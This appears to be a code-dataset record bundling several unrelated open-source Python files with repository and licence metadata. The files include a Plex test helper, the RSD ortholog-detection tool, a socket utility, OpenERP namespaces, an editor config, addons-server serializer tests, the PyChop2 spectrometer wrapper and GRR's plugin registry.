|
sdague/home-assistant
|
tests/components/plex/helpers.py
|
Python
|
apache-2.0
| 248
| 0
|
"""Helper
|
methods for Plex tests."""
from plexwebsocket import SIGNAL_DATA
def trigg
|
er_plex_update(mock_websocket):
"""Call the websocket callback method."""
callback = mock_websocket.call_args[0][1]
callback(SIGNAL_DATA, None, None)
|
todddeluca/reciprocal_smallest_distance
|
rsd/rsd.py
|
Python
|
mit
| 32,578
| 0.005556
|
#!/usr/bin/env python2.7
'''
RSD: The reciprocal smallest distance algorithm.
Wall, D.P., Fraser, H.B. and Hirsh, A.E. (2003) Detecting putative orthologs, Bioinformatics, 19, 1710-1711.
Original author: Dennis P. Wall, Department of Biological Sciences, Stanford University.
Contributors: I-Hsien Wu, Computational Biology Initiative, Harvard Medical School
Maintainer: Todd F. DeLuca, Center for Biomedical Informatics, Harvard Medical School
This program is written to run on linux. It has not been tested on Windows.
To run this program you need to have installed on your system:
Python 2.7
NCBI BLAST 2.2.24
paml 4.4
Kalign 2.04 (recommended) or clustalw 2.0.9 (deprecated)
See README for full details.
'''
# python package version
# should match r"^__version__ = '(?P<version>[^']+)'$" for setup.py
__version__ = '1.1.7'
import cStringIO
import glob
import logging
import os
import re
import shutil
import subprocess
import time
import fasta
import nested
import util
PAML_ERROR_MSG = 'paml_error'
FORWARD_DIRECTION = 0
REVERSE_DIRECTION = 1
DASHLEN_RE = re.compile('^(-*)(.*?)(-*)$')
MAX_HITS = 3
MATRIX_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'jones.dat')
CODEML_CONTROL_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'codeml.ctl')
# Constants used when aligning seqs with clustalw. Kalign does not need these.
USE_CLUSTALW = util.getBoolFromEnv('RSD_USE_CLUSTALW', False)
CLUSTAL_INPUT_FILENAME = 'clustal_fasta.faa'
CLUSTAL_ALIGNMENT_FILENAME = 'clustal_fasta.aln'
#################
# BLAST FUNCTIONS
#################
#
# Used to compute blast hits between two genomes, parse the results, and save the best hits to a
|
file
#
def f
|
ormatForBlast(fastaPath):
# os.chdir(os.path.dirname(fastaPath))
# cmd = 'formatdb -p -o -i'+os.path.basename(fastaPath)
# cmd = 'formatdb -p -o -i'+fastaPath
# redirect stdout to /dev/null to make the command quiter.
cmd = ['makeblastdb', '-in', fastaPath, '-dbtype', 'prot', '-parse_seqids']
with open(os.devnull, 'w') as devnull:
subprocess.check_call(cmd, stdout=devnull)
def getHitId(hit):
return hit[0]
def getHitEvalue(hit):
'''
returns evalue as a float
'''
return hit[1]
def loadBlastHits(path):
'''
path: location of stored blast hits computed by computeBlastHits()
returns: mapping object from query id to hits. used to be a bsddb, now is a dict.
'''
return util.loadObject(path)
def getBlastHits(queryFastaPath, subjectIndexPath, evalue, limitHits=MAX_HITS, workingDir='.', copyToWorking=False):
'''
queryFastaPath: location of fasta file of query sequences
subjectIndexPath: location and name of blast-formatted indexes.
evalue: a string or float representing the maximum evalue threshold of hits to get.
workingDir: creates, uses, and removes a directory under workingDir.
copyToWorking: if True, copy query fasta path and subject index files to within the working directory and use the copies to blast.
can improve performance if the working directory is on local disk and the files are on a slow network.
blasts every sequence in query agaist subject, adding hits that are better than evalue to a list stored in a dict keyed on the query id.
'''
# work in a nested tmp dir to avoid junking up the working dir.
with nested.NestedTempDir(dir=workingDir, nesting=0) as tmpDir:
if copyToWorking:
localFastaPath = os.path.join(tmpDir, 'query.fa')
shutil.copyfile(queryFastaPath, localFastaPath)
localIndexDir = os.path.join(tmpDir, 'local_blast')
os.makedirs(localIndexDir, 0770)
localIndexPath = os.path.join(localIndexDir, os.path.basename(subjectIndexPath))
for path in glob.glob(subjectIndexPath+'*'):
if os.path.isfile:
shutil.copy(path, localIndexDir)
queryFastaPath = localFastaPath
subjectIndexPath = localIndexPath
blastResultsPath = os.path.join(tmpDir, 'blast_results')
# blast query vs subject, using /opt/blast-2.2.22/bin/blastp
cmd = ['blastp', '-outfmt', '6', '-evalue', str(evalue),
'-query', queryFastaPath, '-db', subjectIndexPath,
'-out', blastResultsPath]
subprocess.check_call(cmd)
# parse results
hitsMap = parseResults(blastResultsPath, limitHits)
return hitsMap
def computeBlastHits(queryFastaPath, subjectIndexPath, outPath, evalue, limitHits=MAX_HITS, workingDir='.', copyToWorking=False):
'''
queryFastaPath: location of fasta file of query sequences
subjectIndexPath: location and name of blast-formatted indexes.
evalue: a string or float representing the maximum evalue threshold of hits to get.
outPath: location of file where blast hits are saved.
workingDir: creates, uses, and removes a directory under workingDir.
copyToWorking: if True, copy query fasta path and subject index files to within the working directory and use the copies to blast.
can improve performance if the working directory is on local disk and the files are on a slow network.
Runs getBlastHits() and persists the hits to outPath.
'''
hitsMap = getBlastHits(queryFastaPath, subjectIndexPath, evalue, limitHits, workingDir, copyToWorking)
util.dumpObject(hitsMap, outPath)
def parseResults(blastResultsPath, limitHits=MAX_HITS):
'''
returns: a map from query seq id to a list of tuples of (subject seq id, evalue) for the top hits of the query sequence in the subject genome
'''
# parse tabular results into hits. thank you, ncbi, for creating results this easy to parse.
hitsMap = {}
hitsCountMap = {}
prevSeqId = None
prevHitId = None
fh = open(blastResultsPath)
for line in fh:
splits = line.split()
try:
seqId = fasta.idFromName(splits[0]) # remove namespace prefix, e.g. 'gi|'
hitId = fasta.idFromName(splits[1])
hitEvalue = float(splits[10])
except Exception as e:
logging.exception('parseResults(): prevSeqId: {}, prevHitId: {}, line: {}'.format(prevSeqId, prevHitId, line))
# results table reports multiple "alignments" per "hit" in ascending order by evalue
# we only store the top hits.
if prevSeqId != seqId or prevHitId != hitId:
prevSeqId = seqId
prevHitId = hitId
if seqId not in hitsCountMap:
hitsCountMap[seqId] = 0
hitsMap[seqId] = []
if not limitHits or hitsCountMap[seqId] < limitHits:
hitsCountMap[seqId] += 1
hitsMap[seqId].append((hitId, hitEvalue))
fh.close()
return hitsMap
###############
# RSD FUNCTIONS
###############
def pamlGetDistance(path):
filename = '%s/2AA.t'%path
# adding a pause on the off-chance that the filesystem might be lagging a bit, causing the open() to fail below.
# I think it is more likely that codeml in runPaml_all() is failing before writing the file.
if not os.path.isfile(filename):
time.sleep(0.5)
with open(filename) as rst:
get_rst = rst.readlines()
os.unlink(filename)
if not get_rst:
raise Exception(PAML_ERROR_MSG, path)
str = ''
for line in get_rst[1:]:
cd1 = line.split()
if not len(cd1) > 1:
str += "%s "%(line.split('\n')[0])
continue
if len(cd1) > 1:
str+="%s %s"%(cd1[0], cd1[1])
dist = float(str.split()[2])
return dist
def alignFastaKalign(input):
'''
input: string containing fasta formatted sequences to be aligned.
runs alignment program kalign
Returns: fasta-formatted aligned sequences
'''
alignedFasta = util.run(['kalign', '-f', 'fasta'], input) # output clustalw format
return alignedFasta.replace('\n\n', '\n') # replace fixes a bug in Kalign version 2.04, where if a seq is exactly 60 chars long, an extra newline is output.
def alignFastaClustalw(input, path):
'''
input: string containing f
|
USC-ACTLab/pyCreate2
|
pyCreate2/visualization/__init__.py
|
Python
|
mit
| 59
| 0
|
from
|
.virtual_create import *
__all__ = ["Virtua
|
lCreate"]
|
carzil/bowman
|
bowman/utils.py
|
Python
|
gpl-2.0
| 1,151
| 0.004344
|
# Copyright 2012 Andreev Alexander <carzil@yandex.ru>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import struct
from .server.exceptions import Disconnect
import math
PACK_HEADER = ">l" # pack_size
PACK_HEADER_SIZE = struct.calcsize(PACK_HEADER)
class Connection():
def __init__(self, socket_):
self.socket = socket_
def get_pack(self):
data = self.socket.recv(PACK_HEADER_SIZE)
try:
pack_size = struct.unpack(PACK_HEADER, data)[0]
except struct.error:
raise Disconnect()
data = self.sock
|
et.recv(pack_size)
data = data.decode("utf-8")
return data
def send_pack(self, data):
if not isinstance(data, bytes):
data = bytes(data, "utf-8")
l = len(data)
pack_size = struct.pack(PACK_HEADER, l)
self.socket.send(pack_size)
self.socket.send(data)
def distance(player1, player2):
return round(
math.sqrt(
(player1.x - player2.x) ** 2 + (player1.y - player2.
|
y) ** 2
)
)
|
diogocs1/comps
|
web/openerp/report/common.py
|
Python
|
apache-2.0
| 3,337
| 0.013785
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
pageSize = {
'A4': (210,297),
'A5': (148.5,105)
}
odt_namespace = {
"office":"{urn:oasis:names:tc:opendocument:xmlns:office:1.0}",
"style":"{urn:oasis:names:tc:opendocument:xmlns:style:1.0}",
"text":"{urn:oasis:names:tc:opendocument:xmlns:text:1.0}",
"table":"{urn:oasis:names:tc:opendocument:xmlns:table:1.0}",
"draw":"{urn:oasis:names:tc:opendocument:xmlns:drawing:1.0}",
"fo":"{urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0}",
"xlink":"{http://www.w3.org/1999/xlink}",
"dc":"{http://purl.org/dc/elements/1.1/}",
"meta":"{urn:oasis:names:tc:opendocument:xmlns:meta:1.0}",
"number":"{urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0}",
"svg":"{urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0}",
"chart":"{urn:oasis:names:tc:opendocument:xmlns:chart:1.0}",
"dr3d":"{urn:oasis:names:tc:open
|
document:xmlns:dr3d:1.0}",
"math":"{http://www.w3.org/1998/Math/MathML}",
"form":"{urn:oasis:names:tc:opendocument:xmlns:form:1.0}",
"script":"{urn:oasis:names:tc:opendocument:xmlns:script:1.0}",
"ooo":"{http://openoffice.org/2004/office}",
"ooow":"{http://openoffice.org/2004/
|
writer}",
"oooc":"{http://openoffice.org/2004/calc}",
"dom":"{http://www.w3.org/2001/xml-events}" }
sxw_namespace = {
"office":"{http://openoffice.org/2000/office}",
"style":"{http://openoffice.org/2000/style}",
"text":"{http://openoffice.org/2000/text}",
"table":"{http://openoffice.org/2000/table}",
"draw":"{http://openoffice.org/2000/drawing}",
"fo":"{http://www.w3.org/1999/XSL/Format}",
"xlink":"{http://www.w3.org/1999/xlink}",
"dc":"{http://purl.org/dc/elements/1.1/}",
"meta":"{http://openoffice.org/2000/meta}",
"number":"{http://openoffice.org/2000/datastyle}",
"svg":"{http://www.w3.org/2000/svg}",
"chart":"{http://openoffice.org/2000/chart}",
"dr3d":"{http://openoffice.org/2000/dr3d}",
"math":"{http://www.w3.org/1998/Math/MathML}",
"form":"{http://openoffice.org/2000/form}",
"script":"{http://openoffice.org/2000/script}",
"ooo":"{http://openoffice.org/2004/office}",
"ooow":"{http://openoffice.org/2004/writer}",
"oooc":"{http://openoffice.org/2004/calc}",
"dom":"{http://www.w3.org/2001/xml-events}"}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
reuk/wayverb
|
.ycm_extra_conf.py
|
Python
|
gpl-2.0
| 5,675
| 0.021498
|
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
'-DUSE_CLANG_COMPLETER',
'-std=c++14',
'-xc++',
# Project-specific flags:
'-Isrc/waveguide/include',
'-Isrc/utilities/include',
'-Isrc/audio_file/inc
|
lude',
'-Isrc/frequency_domain/include',
'-Isrc/waveguide/compensation_signal/lib/include',
'-Isrc/raytracer/include',
'-Isrc/core/include',
'-Isrc/
|
hrtf/lib/include',
'-Isrc/combined/include',
'-Ibin/box/include',
'-Ibuild/include',
'-Ibuild/dependencies/include',
'-Ibuild/src/core',
'-Ibuild/src/waveguide',
'-Iwayverb/Source',
'-Iwayverb/JuceLibraryCode/modules',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return { 'flags': final_flags }
|
eviljeff/olympia
|
src/olympia/activity/tests/test_serializers.py
|
Python
|
bsd-3-clause
| 4,454
| 0
|
# -*- coding: utf-8 -*-
from rest_framework.test import APIRequestFactory
from olympia import amo
from olympia.activity.models import ActivityLog
from olympia.activity.serializers import ActivityLogSerializer
from olympia.amo.tests import TestCase, addon_factory, user_factory
class LogMixin(object):
def log(self, comments, action, created=None):
version = self.addon.find_latest_version(
channel=amo.RELEASE_CHANNEL_LISTED)
details = {'comments': comments,
'version': version.version}
kwargs = {'user': self.user, 'details': details}
al = ActivityLog.create(action, self.addon, version, **kwargs)
if created:
al.update(created=created)
return al
class TestReviewNotesSerializerOutput(TestCase, LogMixin):
def setUp(self):
self.request = APIRequestFactory().get('/')
self.user = user_factory(reviewer_name='fôo')
self.addon = addon_factory()
self.now = self.days_ago(0)
self.entry = self.log(u'Oh nøes!', amo.LOG.REJECT_VERSION, self.now)
def serialize(self, context=None):
if context is None:
context = {}
context['request'] = self.request
serializer = ActivityLogSerializer(self.entry, context=context)
return serializer.to_representation(self.entry)
def test_basic(self):
result = self.serialize()
assert result['id'] == self.entry.pk
assert result['date'] == self.now.isoformat() + 'Z'
assert result['action'] == 'rejected'
assert result['action_label'] == 'Rejected'
assert result['comments'] == u'Oh nøes!'
# To allow reviewers to stay anonymous the user object only contains
# the author name, which can use the reviewer name alias if present
# depending on the action.
assert result['user'] == {
'name': self.user.reviewer_name,
}
def test_basic_v3(self):
self.request.version = 'v3'
result = self.serialize()
assert result['id'] == self.entry.pk
assert result['date'] == self.now.isoformat() + 'Z'
assert result['action'] == 'rejected'
assert result['action_label'] == 'Rejected'
assert result['comments'] == u'Oh nøes!'
# For backwards-compatibility in API v3 the id, url and username are
# present but empty - we still don't want to reveal the actual reviewer
# info.
assert result['user'] == {
'id': None,
'url': None,
'username': None,
'name': self.user.reviewer_name,
}
def test_basic_somehow_not_a_reviewer_action(self):
"""Like test_basic(), but somehow the action is not a reviewer action
and therefore shouldn't use the reviewer_name."""
self.entry.update(action=amo.LOG.ADD_RATING.id)
result = self.serialize()
assert result['user'] == {
'name': self.user.name,
}
def test_should_highlight(self):
result = self.serialize(context={'to_highlight': [self.entry.pk]})
assert result['id'] == self.entry.pk
assert result['highlight']
def test_should_not_highlight(self):
no_highlight = self.log(u'something élse', amo.LOG.REJECT_VERSION)
result = self.serialize(context={'to_highlight': [no_highlight.pk]})
assert result['id'] == self.entry.pk
assert not result['highlight']
def test_sanitized_activity_detail_not_exposed_to_developer(self):
self.entry = self.log(u'ßäď ŞŤųƒƒ', amo.LOG.REQUEST_ADMIN_REVIEW_CODE)
result = self.serialize()
assert result['action_label'] == (
amo.LOG.REQUEST_ADMIN_REVIEW_CODE.short)
# Comments should be the santize
|
d text rather than the actual content.
assert result['comments'] == amo.LOG.REQUEST_ADMIN_REVIEW_CODE.sanitize
assert result['comments'].startswith(
'The addon has been flagged for Admin Review.')
def test_log_entry_without_details(self):
# Create a log but without a details property.
self.entry = ActivityLog.create(
amo.LOG.APPROVAL
|
_NOTES_CHANGED, self.addon,
self.addon.find_latest_version(channel=amo.RELEASE_CHANNEL_LISTED),
user=self.user)
result = self.serialize()
# Should output an empty string.
assert result['comments'] == ''
|
mganeva/mantid
|
scripts/PyChop/PyChop2.py
|
Python
|
gpl-3.0
| 10,393
| 0.003464
|
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX
|
- License - Identifier: GPL - 3.0 +
# pylint: disable=line-too-long, invalid-name, old-style-class, multiple-statements, too-many-branches
"""
This module contains the PyChop2 class which allows calculation of the resolution and flux of
direct geometry time-of-flight inela
|
stic neutron spectrometers.
"""
from __future__ import (absolute_import, division, print_function)
from .ISISFermi import ISISFermi
from .ISISDisk import ISISDisk
import warnings
class PyChop2:
"""
PyChop2 is a class to calculate the energy resolution of direct geometry time-of-flight spectrometers
based on calculations of the time spread of neutron bunches. It currently has separate implementations
for instruments using Fermi choppers and disk choppers for monochromation.
"""
__Classes = {
'LET': ISISDisk, # LET default
'LETHIFLUX': ISISDisk, # LET, high flux configuration
'LETINTERMED': ISISDisk, # LET, medium flux configuration
'LETHIRES': ISISDisk, # LET, low flux configuration
'MAPS': ISISFermi,
'MARI': ISISFermi,
'MERLIN': ISISFermi}
__MultiRepClasses = {
'LET': ISISDisk, # LET default
'LETHIFLUX': ISISDisk, # LET, high flux configuration
'LETINTERMED': ISISDisk, # LET, medium flux configuration
'LETHIRES': ISISDisk, # LET, low flux configuration
'MERLIN': ISISDisk,
'MAPS': ISISDisk,
'MARI': ISISDisk}
def __init__(self, instname, *args):
warnings.warn("The PyChop2 class is deprecated and will be removed in the next Mantid version. "
"Please use the Instrument class or the official PyChop CLI interface.", DeprecationWarning)
instname = instname.upper()
if instname not in self.__Classes.keys():
raise ValueError('Instrument %s not recognised' % (instname))
self.object = self.__Classes[instname](instname, *args)
self.instname = instname
def allowedInstruments(self):
"""
! Returns a list of currently implemented instruments
"""
return self.__Classes.keys()
def setInstrument(self, *args):
"""
! Sets the instrument to calculate for
"""
if self.__Classes[args[0]] != self.__Classes[self.instname]:
self.object = self.__Classes[args[0]](*args)
else:
self.object.setInstrument(*args)
self.instname = args[0]
def setChopper(self, *args):
"""
! Sets the chopper rotor (Fermi instruments) or instrument configuration (disks instruments)
"""
self.object.setChopper(*args)
def getChopper(self):
"""
! Returns the currently set chopper rotor or instrument configuration
"""
return self.object.getChopper()
def setFrequency(self, *args, **kwargs):
"""
! Sets the chopper frequency(ies)
"""
self.object.setFrequency(*args, **kwargs)
def getFrequency(self):
"""
! Returns (a list of) the current chopper frequency(ies)
"""
return self.object.getFrequency()
def setEi(self, *args):
"""
! Sets the desired or focused incident energy
"""
self.object.setEi(*args)
def getEi(self, *args):
"""
! Returns the currently set desired or focused incident energy
"""
return self.object.getEi(*args)
def getObject(self):
"""
! Returns the object instance which actually handles the calculation.
! This object's type is a subclass specific to Fermi or Disk instruments and will have
! additional methods specific to the class.
"""
return self.object
def getResolution(self, *args):
"""
! Returns the energy resolution as a function of energy transfer
!
! .getResolution() - if Ei is set, calculates for [0.05Ei,0.95Ei] in 20 steps
! .getResolution(Etrans) - if Ei is set, calculates for Etrans energy transfer
! .getResolution(Etrans, Ei) - calculates for an Ei different from that set previously
"""
return self.object.getResolution(*args)
def getFlux(self, *args):
"""
! Returns (an estimate of) the neutron flux at the sample at the set Ei in n/cm^2/s
"""
return self.object.getFlux(*args)
def getResFlux(self, *args):
"""
! Returns a tuple of the (resolution, flux)
"""
return self.object.getResFlux(*args)
def getWidths(self, *args):
"""
! Returns the individual time widths that go into the calculated energy widths as a dict
"""
return self.object.getWidths(*args)
def __getMultiRepObject(self):
"""
Private method to obtain multi-rep information
"""
if self.instname not in self.__MultiRepClasses.keys():
raise ValueError('Instrument %s does not support multirep mode')
if self.__MultiRepClasses[self.instname] == self.__Classes[self.instname]:
obj = self.object
else:
obj = self.__MultiRepClasses[self.instname](self.instname)
obj.setChopper(self.object.getChopper())
obj.setFrequency(self.object.getFrequency(), Chopper2Phase=self.object.diskchopper_phase)
obj.setEi(self.object.getEi())
return obj
def getAllowedEi(self, *args):
"""
! For instruments which support multi-rep mode, returns a list of allowed incident energies
"""
return self.__getMultiRepObject().getAllowedEi(*args)
def getMultiRepResolution(self, *args):
"""
! For instruments which support multi-rep mode, returns the resolution for each rep
"""
return self.__getMultiRepObject().getMultiRepResolution(*args)
def getMultiRepFlux(self, *args):
"""
! For instruments which support multi-rep mode, returns the flux for each rep
"""
return self.__getMultiRepObject().getMultiRepFlux(*args)
def getMultiWidths(self, *args):
"""
! Returns the individual time widths that go into the calculated energy widths as a dict
"""
return self.__getMultiRepObject().getMultiWidths(*args)
def plotMultiRepFrame(self, *args):
"""
! For instruments which support multi-rep mode, plots the time-distance diagram
"""
return self.__getMultiRepObject().plotFrame(*args)
@classmethod
def calculate(cls, *args, **kwargs):
"""
! Calculates the resolution and flux directly (without setting up a PyChop2 object)
!
! PyChop2.calculate('mari', 's', 250., 55.) # Instname, Chopper Type, Freq, Ei in order
! PyChop2.calculate('let', 180, 2.2) # For LET, chopper type is not needed.
! PyChop2.calculate('let', [160., 80.], 1.) # For LET, specify resolution and pulse remover freq
! PyChop2.calculate('let', 'High flux', 80, 2.2) # LET default is medium flux configuration
! PyChop2.calculate(inst='mari', chtyp='s', freq=250., ei=55.) # With keyword arguments
! PyChop2.calculate(inst='let', variant='High resolution', freq=[160., 80.], ei=2.2)
!
! For LET, the allowed variant names are:
! 'With Chopper 3'
! 'Without Chopper 3'
! You have to use these strings exactly.
!
! By default this function returns the elastic resolution and flux only.
! If you want the inelastic resolution, specify the inelastic energy transfer
! as either the last positional argument, or as a keyword argument, e.g.:
!
! PyChop2.calculate('merlin', 'g', 450., 60., range(55))
! PyChop2.calculate('maps', 'a', 450., 600., etrans=np.linspace(0,550,55))
!
! The results a
|
opencord/voltha
|
voltha/northbound/rpc_dispatcher.py
|
Python
|
apache-2.0
| 803
| 0
|
#
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unles
|
s required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RPC request dispatcher
"""
from twisted.internet.defer import DeferredQueue
class RpcDispatcher(object):
def __init__(self):
self.queue = DeferredQueue()
#
|
work in progress
|
MiniSEC/GRR_clone
|
lib/registry.py
|
Python
|
apache-2.0
| 5,555
| 0.009541
|
#!/usr/bin/env python
"""This is the GRR class registry.
A central place responsible for registring plugins. Any class can have plugins
if it defines __metaclass__ = MetaclassRegistry. Any derived class from this
baseclass will have the member classes as a dict containing class name by key
and class as value.
"""
# The following are abstract base classes
import abc
import threading
import logging
# This is required to monkey patch various older libraries so
# pylint: disable=unused-import
from grr.lib import compatibility
# pylint: enable=unused-import
class MetaclassRegistry(abc.ABCMeta):
"""Automatic Plugin Registration through metaclasses."""
def __init__(cls, name, bases, env_dict):
abc.ABCMeta.__init__(cls, name, bases, env_dict)
# Abstract classes should not be registered. We define classes as abstract
# by giving them the __abstract attribute (this is not inheritable) or by
# naming them Abstract<ClassName>.
abstract_attribute = "_%s__abstract" % name
if (not cls.__name__.startswith("Abstract") and
not hasattr(cls, abstract_attribute)):
# Attach the classes dict to the baseclass and have all derived classes
# use the same one:
for base in bases:
try:
cls.classes = base.classes
cls.classes_by_name = base.classes_by_name
cls.plugin_feature = base.plugin_feature
cls.top_level_class = base.top_level_class
break
except AttributeError:
pass
try:
if cls.classes and cls.__name__ in cls.classes:
logging.warn("Duplicate names for registered classes: %s, %s",
cls, cls.classes[cls.__name__])
cls.classes[cls.__name__] = cls
cls.classes_by_name[getattr(cls, "name", None)] = cls
cls.class_list.append(cls)
except AttributeError:
cls.classes = {cls.__name__: cls}
cls.classes_by_name = {getattr(cls, "name", None): cls}
cls.class_list = [cls]
cls.plugin_feature = cls.__name__
# Keep a reference to the top level class
cls.top_level_class = cls
try:
if cls.top_level_class.include_plugins_as_attributes:
setattr(cls.top_level_class, cls.__name__, cls)
except AttributeError:
pass
def NewPlugin(cls, name):
"""Return the class of the implementation that carries that name.
Args:
name: The name of the plugin to return.
Raises:
KeyError: If the plugin does not exist.
Returns:
A the registered class referred to by the name.
"""
return cls.classes[name]
# Utility functions
class HookRegistry(object):
"""An initializer that can be extended by plugins.
Any classes which extend this will be instantiated exactly once when the
system is initialized. This allows plugin modules to register initialization
routines.
"""
# A list of class names that have to be initialized before this hook.
pre = []
# Already run hooks
already_run_once = set()
lock = threading.RLock()
def _RunSingleHook(self, hook_cls, executed_set, required=None):
"""Run the single hook specified by resolving all its prerequisites."""
# If we already ran do nothing.
if hook_cls in executed_set:
return
# Ensure all the pre execution hooks are run.
for pre_hook in hook_cls.pre:
pre_hook_cls = self.classes.get(pre_hook)
if pre_hook_cls is None:
raise RuntimeError("Pre Init Hook %s in %s could not"
" be found. Missing import?" % (pre_hook, hook_cls))
self._RunSingleHook(self.classes[pre_hook], executed_set,
required=hook_cls.__name__)
# Now run this hook.
cls_instance = hook_cls()
if required:
logging.debug("Initializing %s, required by %s",
hook_cls.__name__, required)
else:
logging.debug("Initializing %s", hook_cls.__name__)
# Always call the Run hook.
cls_instance.Run()
executed_set.add(hook_cls)
# Only call the RunOnce() hook if not already called.
if hook_cls not in self.already_run_once:
cls_instance.RunOnce()
self.already_run_once.add(hook_cls)
def _RunAllHooks(self, executed_hooks):
for hook_cls in self.__class__.classes.values():
self._RunSingleHook(hook_cls, executed_hooks)
def Init(self):
with InitHook.lock:
executed_hooks = set()
while 1:
try:
# This code allows init hooks to import modules which have more hooks
|
# defined - We ensure we only run each hook only once.
last_run_hooks = len(executed_hooks)
self._RunAllHooks(executed_hooks)
if last_run_hooks == len(executed_hooks):
break
except StopIteration:
logging.debug("Recalculating Hoo
|
k dependency.")
def RunOnce(self):
"""Hooks which only want to be run once."""
def Run(self):
"""Hooks that can be called more than once."""
class InitHook(HookRegistry):
"""Global GRR init registry.
Any classes which extend this class will be instantiated exactly
once when the system is initialized. This allows plugin modules to
register initialization routines.
"""
__metaclass__ = MetaclassRegistry
# This method is only used in tests and will rerun all the hooks to create a
# clean state.
def TestInit():
InitHook().Init()
def Init():
